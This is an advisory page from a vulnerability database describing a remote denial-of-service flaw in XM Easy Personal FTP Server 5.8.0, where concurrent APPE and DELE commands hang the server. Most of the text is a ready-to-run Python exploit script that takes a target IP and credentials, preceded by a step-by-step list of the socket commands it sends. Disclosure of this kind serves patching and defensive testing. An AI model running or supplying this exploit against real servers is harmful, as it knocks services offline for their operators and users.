XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service

2009-11-15 / 2009-11-16
Credit: zhangmc
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Date of Discovery: 13-Nov-2009 Credits:zhangmc[at]mail.ustc.edu.cn Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server is an easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server when "APPE" is used in one socket connection while "DELE" command is used in another. Details: If you could log on the server successfully, take the following steps and the ftp server will stop responding: first socket connection: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.sock.send("PORT 127,0,0,1,122,107\r\n") 5.sock.send("APPE "+ test_string +"\r\n") 6.sock.close() second socket connection: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.sock.send("DELE "+ test_string +"\r\n") Severity: High Exploit example: #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] test_string="a" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] "+ r sock.send("user %s\r\n" %username) print "[-] "+ ("user %s\r\n" %username) r=sock.recv(1024) print "[+] "+ r sock.send("pass %s\r\n" %passwd) print "[-] "+ ("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] "+ r sock_data.bind(('127.0.0.1',31339)) sock_data.listen(1) sock.send("PORT 127,0,0,1,122,107\r\n") print "[-] "+ ("PORT 127,0,0,1,122,107\r\n") r=sock.recv(1024) print "[+] "+ r sock.send("APPE "+ test_string +"\r\n") print "[-] "+ ("APPE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.close() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] "+ r sock.send("user %s\r\n" %username) print "[-] "+ ("user %s\r\n" %username) r=sock.recv(1024) print "[+] "+ r sock.send("pass %s\r\n" %passwd) print "[-] "+ ("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] "+ r sock.send("DELE "+ test_string +"\r\n") print "[-] "+ ("DELE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sys.exit(0);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top